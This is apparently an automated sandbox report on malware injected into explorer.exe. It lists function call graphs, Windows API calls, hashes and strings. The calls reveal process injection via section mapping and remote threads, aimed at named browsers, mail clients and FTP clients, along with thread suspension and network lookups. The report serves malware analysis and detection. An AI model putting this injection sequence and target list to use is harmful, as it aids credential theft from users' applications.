                                                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                        • Instruction Fuzzy Hash: 72415B30718F0C4FDB99EF6D8499B2AB6E2FB99341F40456EA54EC3262DE34DD448782
                                                                                                        Function 003C2938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 232 3c2938-3c2943 233 3c2984 232->233 234 3c2945-3c2948 232->234 236 3c2986-3c298b 233->236 234->233 235 3c294a-3c2970 CreateFileW 234->235 237 3c2980-3c2982 235->237 238 3c2972-3c297a CloseHandle 235->238 237->236 238->237
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3498533004-0
                                                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                        • Instruction ID: d45f4556bc98dee0a5c65bd542ad89576d3fb17844e482f09bd4e9493782d882
                                                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                        • Instruction Fuzzy Hash: 5AF02B7121570A4FE7456FB84498737B6D0FB08315F18473DE85AC22D0DB748C528702
                                                                                                        Function 003C22B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 251 3c22b4-3c22c6 252 3c22c8-3c22d0 CreateStreamOnHGlobal 251->252 253 3c22d6-3c22e6 251->253 252->253
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE ref: 003C22D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateGlobalStream
                                                                                                        • String ID:
                                                                                                        • API String ID: 2244384528-0
                                                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                        • Instruction ID: 321a2a249cccc43946f344bea037f32e8441d9324d045b9b7548199cb4b5b631
                                                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                        • Instruction Fuzzy Hash: 00E0C230108B0A8FD798AFBCE4CA57A33A1FB9C252B05093FE005CB114D2798CC1C741
                                                                                                        Function 003C298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 254 3c298c-3c2997 255 3c2999-3c299c 254->255 256 3c29b5 254->256 255->256 257 3c299e-3c29a7 GetFileAttributesW 255->257 258 3c29b7-3c29bc 256->258 259 3c29a9-3c29af 257->259 260 3c29b1-3c29b3 257->260 259->260 260->258
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE ref: 003C299E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                        • Instruction ID: ddfb727e897995a23b707625c96e44b56998bb885c9885506603d286f9be1c1b
                                                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                        • Instruction Fuzzy Hash: A9D05E22612905076B7626F908D977220A4D71932AB15022EFA36C11A0EBA5CCA5A301
                                                                                                        Function 003C1860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 261 3c1860-3c1870 call 3c1ad4 264 3c1886-3c188b 261->264 265 3c1872-3c1880 RtlFreeHeap 261->265 265->264
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                        • Instruction ID: eadcac103f6ded0972b1c8f5b6fe416202d02949734da3f02d76e5dc4ef3d463
                                                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                        • Instruction Fuzzy Hash: 83D02224706A040BFF2CBBFA0C8D2347AD2E758312B088028B808C3252DD39CC85C301

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.3%
                                                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                                                        Signature Coverage:27.5%
                                                                                                        Total number of Nodes:306
                                                                                                        Total number of Limit Nodes:42
                                                                                                        execution_graph 707 587728 708 587904 707->708 709 58774b 707->709 708->708 710 58785a LoadLibraryA 709->710 713 58789f VirtualProtect VirtualProtect 709->713 711 587871 710->711 711->709 714 587883 GetProcAddress 711->714 713->708 714->711 715 587899 714->715 991 58245e lstrlen 992 5824a5 991->992 993 582476 CryptBinaryToStringA 991->993 993->992 994 582489 993->994 997 582861 GetProcessHeap RtlAllocateHeap 994->997 996 582494 CryptBinaryToStringA 996->992 997->996 716 581000 717 581010 716->717 718 581007 716->718 720 581016 718->720 769 582608 VirtualQuery 720->769 723 581097 723->717 725 58102c RtlMoveMemory 726 58104d 725->726 727 581071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 582861 GetProcessHeap RtlAllocateHeap 726->806 729 58109e 727->729 730 581092 727->730 772 5810a4 729->772 730->723 733 581095 730->733 732 581052 RtlMoveMemory 732->727 807 581332 733->807 734 5810a3 736 582861 GetProcessHeap RtlAllocateHeap 734->736 737 5810cc 736->737 738 5810dc CreateToolhelp32Snapshot 737->738 739 5810f0 Process32First 738->739 740 581322 Sleep 738->740 741 58131b CloseHandle 739->741 742 58110c lstrcmpiA 739->742 740->738 741->740 743 581124 lstrcmpiA 742->743 766 581280 742->766 744 581138 lstrcmpiA 743->744 743->766 746 58114c lstrcmpiA 744->746 744->766 745 5825ad OpenProcess IsWow64Process IsWow64Process CloseHandle 745->766 747 581160 lstrcmpiA 746->747 746->766 749 581170 lstrcmpiA 747->749 747->766 748 581305 Process32Next 748->742 750 581319 748->750 751 581184 lstrcmpiA 749->751 749->766 750->741 752 581198 lstrcmpiA 751->752 751->766 753 5811ac lstrcmpiA 752->753 752->766 754 5811c0 lstrcmpiA 753->754 753->766 755 5811d4 lstrcmpiA 754->755 754->766 756 5811e8 lstrcmpiA 755->756 755->766 758 5811fc lstrcmpiA 756->758 756->766 757 582608 VirtualQuery 757->766 759 58120c lstrcmpiA 758->759 758->766 761 58121c lstrcmpiA 759->761 759->766 760 5812ae lstrcmpiA 760->766 762 58122c lstrcmpiA 761->762 761->766 763 58123c lstrcmpiA 762->763 762->766 765 58124c lstrcmpiA 763->765 763->766 764 581819 30 API calls 764->766 765->766 767 58125c lstrcmpiA 765->767 766->745 766->748 766->757 766->760 766->764 767->766 768 58126c lstrcmpiA 767->768 768->748 768->766 770 58101e 769->770 770->723 771 582861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 582861 GetProcessHeap RtlAllocateHeap 772->834 774 5810cc 775 5810dc CreateToolhelp32Snapshot 774->775 776 5810f0 Process32First 775->776 777 581322 Sleep 775->777 778 58131b CloseHandle 776->778 779 58110c lstrcmpiA 776->779 777->775 778->777 780 581124 lstrcmpiA 779->780 799 581280 779->799 781 581138 lstrcmpiA 780->781 780->799 783 58114c lstrcmpiA 781->783 781->799 784 581160 lstrcmpiA 783->784 783->799 786 581170 lstrcmpiA 784->786 784->799 785 581305 Process32Next 785->779 787 581319 785->787 788 581184 lstrcmpiA 786->788 786->799 787->778 789 581198 lstrcmpiA 788->789 788->799 790 5811ac lstrcmpiA 789->790 789->799 791 5811c0 lstrcmpiA 790->791 790->799 792 5811d4 lstrcmpiA 791->792 791->799 793 5811e8 lstrcmpiA 792->793 792->799 795 5811fc lstrcmpiA 793->795 793->799 794 582608 VirtualQuery 794->799 796 58120c lstrcmpiA 795->796 795->799 798 58121c lstrcmpiA 796->798 796->799 797 5812ae lstrcmpiA 797->799 798->799 800 58122c lstrcmpiA 798->800 799->785 799->794 799->797 835 5825ad OpenProcess 799->835 841 581819 799->841 800->799 801 58123c lstrcmpiA 800->801 801->799 803 58124c lstrcmpiA 801->803 803->799 804 58125c lstrcmpiA 803->804 804->799 805 58126c lstrcmpiA 804->805 805->785 805->799 806->732 887 582861 GetProcessHeap RtlAllocateHeap 807->887 809 581340 GetModuleFileNameA 888 582861 GetProcessHeap RtlAllocateHeap 809->888 811 581357 GetCurrentProcessId wsprintfA 889 58263e CryptAcquireContextA 811->889 814 58139c Sleep 894 5824d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 58140d 912 582843 815->912 819 5813ae GetModuleHandleA GetProcAddress 821 5813c9 819->821 822 5813da GetModuleHandleA GetProcAddress 819->822 820 582843 3 API calls 825 58141b RtlExitUserThread 820->825 902 581de3 821->902 823 5813f5 822->823 824 581406 822->824 827 581de3 3 API calls 823->827 828 5824d5 10 API calls 824->828 829 581425 825->829 827->824 828->815 830 58144b 829->830 831 582608 VirtualQuery 829->831 830->729 832 58143a 831->832 832->830 917 581493 832->917 834->774 836 5825cb IsWow64Process 835->836 837 582600 835->837 838 5825dc IsWow64Process 836->838 839 5825ee 836->839 837->799 838->839 840 5825f9 CloseHandle 838->840 839->840 840->837 842 582608 VirtualQuery 841->842 843 581833 842->843 844 581845 OpenProcess 843->844 845 581a76 843->845 844->845 846 58185e 844->846 845->799 847 582608 VirtualQuery 846->847 848 581865 847->848 848->845 849 58188f 848->849 850 581873 NtSetInformationProcess 848->850 872 581a80 849->872 850->849 853 581a80 2 API calls 854 5818d6 853->854 855 581a73 CloseHandle 854->855 856 581a80 2 API calls 854->856 855->845 857 581900 856->857 878 581b17 857->878 860 581a80 2 API calls 861 581930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 581a4e CreateRemoteThread 861->862 863 581985 861->863 864 581a65 CloseHandle 862->864 865 58198b CreateMutexA GetLastError 863->865 868 5819bb GetModuleHandleA GetProcAddress ReadProcessMemory 863->868 866 581a67 CloseHandle CloseHandle 864->866 865->863 867 5819a7 CloseHandle Sleep 865->867 866->855 867->865 869 5819ec WriteProcessMemory 868->869 870 581a47 868->870 869->870 871 581a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->866 871->870 873 581a94 872->873 877 5818b4 872->877 874 581aa4 NtCreateSection 873->874 875 581ac3 873->875 874->875 876 581ad8 NtMapViewOfSection 875->876 875->877 876->877 877->853 879 581b2e 878->879 880 581b60 878->880 881 581b30 RtlMoveMemory 879->881 883 581b71 LoadLibraryA 880->883 885 581bc3 880->885 886 581ba1 GetProcAddress 880->886 881->880 881->881 882 581910 NtUnmapViewOfSection 882->860 883->880 883->882 884 581be1 LdrProcessRelocationBlock 884->882 884->885 885->882 885->884 886->880 886->882 887->809 888->811 890 581384 CreateMutexA GetLastError 889->890 891 582664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 5826aa wsprintfA 891->892 892->892 893 5826cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 582515 894->895 896 582565 CloseHandle 895->896 897 582555 Thread32Next 895->897 898 582521 OpenThread 895->898 896->819 897->895 899 58253c SuspendThread 898->899 900 582544 ResumeThread 898->900 901 58254a CloseHandle 899->901 900->901 901->897 903 581e56 902->903 904 581ded 902->904 903->822 904->903 944 581e93 VirtualProtect 904->944 906 581e04 906->903 945 582815 VirtualAlloc 906->945 908 581e10 909 581e1a RtlMoveMemory 908->909 910 581e2d 908->910 909->910 946 581e93 VirtualProtect 910->946 913 582608 VirtualQuery 912->913 914 58284b 913->914 915 581414 914->915 916 58284f GetProcessHeap HeapFree 914->916 915->820 916->915 918 5814c0 917->918 919 5814a1 917->919 921 5814c8 918->921 922 581510 918->922 947 5817c7 919->947 924 5817c7 5 API calls 921->924 940 5814b6 921->940 966 5826e6 lstrlen lstrlen 922->966 927 5814e0 924->927 925 58155f 928 5826e6 2 API calls 925->928 927->940 954 581647 927->954 931 58156c 928->931 929 581532 968 581752 GetModuleHandleA GetProcAddress 929->968 933 5815a0 931->933 934 581584 931->934 931->940 937 582404 5 API calls 933->937 933->940 971 582404 lstrlen 934->971 941 5815ac 937->941 938 581647 11 API calls 938->940 940->830 941->940 942 581647 11 API calls 941->942 943 5814fb 942->943 943->940 977 5815e0 943->977 944->906 945->908 946->903 948 5817d1 947->948 949 581812 947->949 948->949 950 5826e6 2 API calls 948->950 949->940 951 5817f1 950->951 951->949 982 582861 GetProcessHeap RtlAllocateHeap 951->982 953 581804 RtlMoveMemory 953->949 955 581660 954->955 965 581745 954->965 956 581671 lstrlen 955->956 955->965 957 581683 lstrlen 956->957 956->965 958 581690 getpeername 957->958 957->965 959 5816ae inet_ntoa htons 958->959 958->965 960 5816cc 959->960 959->965 960->965 983 582861 GetProcessHeap RtlAllocateHeap 960->983 962 581717 wsprintfA 963 58173a 962->963 964 582843 3 API calls 963->964 963->965 964->965 965->943 967 58151d 966->967 967->925 967->929 969 581539 968->969 970 581776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->938 969->940 970->969 972 58241c CryptStringToBinaryA 971->972 973 582456 971->973 972->973 974 582438 972->974 973->940 984 582861 GetProcessHeap RtlAllocateHeap 974->984 976 582444 CryptStringToBinaryA 976->973 978 582843 3 API calls 977->978 979 5815f5 978->979 980 582843 3 API calls 979->980 981 5815fc 980->981 981->940 982->953 983->962 984->976 998 581425 999 58144b 998->999 1000 581432 998->1000 1001 582608 VirtualQuery 1000->1001 1002 58143a 1001->1002 1002->999 1003 581493 23 API calls 1002->1003 1003->999 1004 582806 VirtualFree 1005 581eb6 1006 581ed9 1005->1006 1007 581ecc lstrlen 1005->1007 1016 582861 GetProcessHeap RtlAllocateHeap 1006->1016 1007->1006 1009 581ee1 lstrcat 1010 581f1d 1009->1010 1011 581f16 lstrcat 1009->1011 1017 581f4a 1010->1017 1011->1010 1014 582843 3 API calls 1015 581f40 1014->1015 1016->1009 1051 5822b8 1017->1051 1021 581f77 1056 5827e2 lstrlen MultiByteToWideChar 1021->1056 1023 581f86 1057 582374 RtlZeroMemory 1023->1057 1026 581fd8 RtlZeroMemory 1028 58200d 1026->1028 1027 582843 3 API calls 1029 581f2d 1027->1029 1032 58229a 1028->1032 1034 58203b 1028->1034 1059 5822e5 1028->1059 1029->1014 1031 582280 1031->1032 1033 582843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 1068 582861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 58210b wsprintfW 1037 582131 1036->1037 1041 58219e 1037->1041 1069 582861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 58216b wsprintfW 1039->1041 1040 58225d 1042 582843 3 API calls 1040->1042 1041->1040 1070 582861 GetProcessHeap RtlAllocateHeap 1041->1070 1043 582271 1042->1043 1043->1031 1045 582843 3 API calls 1043->1045 1045->1031 1046 5821e9 1047 582256 1046->1047 1071 582815 VirtualAlloc 1046->1071 1049 582843 3 API calls 1047->1049 1049->1040 1050 582243 RtlMoveMemory 1050->1047 1052 581f69 1051->1052 1053 5822c2 1051->1053 1055 582861 GetProcessHeap RtlAllocateHeap 1052->1055 1054 5826e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 581f96 1057->1058 1058->1026 1058->1032 1061 5822f2 1059->1061 1062 582353 1059->1062 1060 5822f6 DnsQuery_W 1060->1061 1061->1060 1061->1062 1063 582335 DnsFree inet_ntoa 1061->1063 1062->1034 1063->1061 1064 582355 1063->1064 1072 582861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 58235f 1073 5827e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1062

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_00581819 11 Function_00581B17 0->11 13 Function_00582608 0->13 15 Function_00581A80 0->15 1 Function_00581C19 2 Function_00581E5D 17 Function_00581D80 2->17 3 Function_0058245E 37 Function_00582861 3->37 4 Function_00582592 5 Function_00581752 6 Function_00581493 6->5 21 Function_00582404 6->21 23 Function_00581647 6->23 24 Function_005817C7 6->24 36 Function_005815E0 6->36 43 Function_005826E6 6->43 7 Function_00581E93 8 Function_005824D5 9 Function_00582815 10 Function_00581016 10->0 10->4 10->13 27 Function_00582731 10->27 28 Function_00581332 10->28 29 Function_00582573 10->29 34 Function_005825AD 10->34 10->37 40 Function_005810A4 10->40 12 Function_00583417 14 Function_00581F4A 14->9 20 Function_00582843 14->20 25 Function_005822B8 14->25 14->27 30 Function_00582374 14->30 14->37 38 Function_005827E2 14->38 42 Function_005822E5 14->42 16 Function_00581DC0 16->1 17->1 18 Function_00581000 18->10 19 Function_00582840 20->13 21->37 22 Function_00582806 23->20 35 Function_005824AE 23->35 23->37 24->37 24->43 25->43 26 Function_0058263E 28->6 28->8 28->13 28->20 28->26 28->37 39 Function_00581DE3 28->39 31 Function_00581EB6 31->14 31->20 31->37 32 Function_00587728 33 Function_00581469 33->6 33->13 36->20 39->2 39->7 39->9 39->16 40->0 40->4 40->13 40->27 40->29 40->34 40->37 41 Function_00581425 41->6 41->13 42->37 42->38

                                                                                                        Executed Functions

                                                                                                        Function 00581016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244stringsleepprocessCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 581016-581020 call 582608 3 581022-58104b call 582861 RtlMoveMemory 0->3 4 581097-581098 0->4 7 58104d-58106b call 582861 RtlMoveMemory 3->7 8 581071-581090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 58109e-5810d7 call 5810a4 call 582861 8->10 11 581092-581093 8->11 21 5810dc-5810ea CreateToolhelp32Snapshot 10->21 11->4 14 581095-581099 call 581332 11->14 14->10 22 5810f0-581106 Process32First 21->22 23 581322-58132d Sleep 21->23 24 58131b-58131c CloseHandle 22->24 25 58110c-58111e lstrcmpiA 22->25 23->21 24->23 26 581280-581289 call 5825ad 25->26 27 581124-581132 lstrcmpiA 25->27 33 58128b-581294 call 582592 26->33 34 581305-581313 Process32Next 26->34 27->26 28 581138-581146 lstrcmpiA 27->28 28->26 30 58114c-58115a lstrcmpiA 28->30 30->26 32 581160-58116a lstrcmpiA 30->32 32->26 35 581170-58117e lstrcmpiA 32->35 33->34 40 581296-58129d call 582573 33->40 34->25 36 581319 34->36 35->26 39 581184-581192 lstrcmpiA 35->39 36->24 39->26 41 581198-5811a6 lstrcmpiA 39->41 40->34 47 58129f-5812ac call 582608 40->47 41->26 43 5811ac-5811ba lstrcmpiA 41->43 43->26 44 5811c0-5811ce lstrcmpiA 43->44 44->26 46 5811d4-5811e2 lstrcmpiA 44->46 46->26 48 5811e8-5811f6 lstrcmpiA 46->48 47->34 53 5812ae-581300 lstrcmpiA call 582731 call 581819 call 582731 47->53 48->26 50 5811fc-58120a lstrcmpiA 48->50 50->26 52 58120c-58121a lstrcmpiA 50->52 52->26 54 58121c-58122a lstrcmpiA 52->54 53->34 54->26 56 58122c-58123a lstrcmpiA 54->56 56->26 58 58123c-58124a lstrcmpiA 56->58 58->26 60 58124c-58125a lstrcmpiA 58->60 60->26 62 58125c-58126a lstrcmpiA 60->62 62->26 64 58126c-58127a lstrcmpiA 62->64 64->26 64->34
                                                                                                        APIs
                                                                                                          • Part of subcall function 00582608: VirtualQuery.KERNEL32(00584434,?,0000001C), ref: 00582615
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00581038
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0058106B
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00581074
                                                                                                        • GetCurrentProcessId.KERNEL32(?,00581010), ref: 0058107A
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005810DF
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 005810FE
                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0058111A
                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0058112E
                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00581142
                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00581156
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00581166
                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0058117A
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0058118E
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 005811A2
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 005811B6
                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 005811CA
                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 005811DE
                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 005811F2
                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00581206
                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00581216
                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00581226
                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00581236
                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00581246
                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00581256
                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00581266
                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00581276
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 005812B4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0058130B
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0058131C
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00581327
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                        • API String ID: 2555639992-1680033604
                                                                                                        • Opcode ID: 695a1b559b075e4d193dd566be9111642ca515b98bfe6aea47608f0cbcefed6e
                                                                                                        • Instruction ID: 9b1b9a977d58da684a2f471a5973eb75017f444a3d7259be621f5b4ebf04f40d
                                                                                                        • Opcode Fuzzy Hash: 695a1b559b075e4d193dd566be9111642ca515b98bfe6aea47608f0cbcefed6e
                                                                                                        • Instruction Fuzzy Hash: 16718730504706ABDB10FBB19C49E6A7FACBF55B90F040929FD41F2091EF25D90ACB69
                                                                                                        Function 005810A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005810DF
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 005810FE
                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0058111A
                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0058112E
                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00581142
                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00581156
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00581166
                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0058117A
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0058118E
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 005811A2
                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 005811B6
                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 005811CA
                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 005811DE
                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 005811F2
                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00581206
                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00581216
                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00581226
                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00581236
                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00581246
                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00581256
                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00581266
                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00581276
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 005812B4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0058130B
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0058131C
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00581327
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                        • API String ID: 3950187957-1680033604
                                                                                                        • Opcode ID: b22e721435c45cc854168f21eb60fcb3a57d60e0cec1671182f04354b6d4af71
                                                                                                        • Instruction ID: 1783c81b96d9d5d1c1b0a25a0569de9adb2250a4df6f99209c89ceaeb6a7557c
                                                                                                        • Opcode Fuzzy Hash: b22e721435c45cc854168f21eb60fcb3a57d60e0cec1671182f04354b6d4af71
                                                                                                        • Instruction Fuzzy Hash: FD515171604706A7DB10FBB18C4AE6E7EECBA45B90B440929FD41F2090EF25D90ACB79
                                                                                                        Function 00587728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
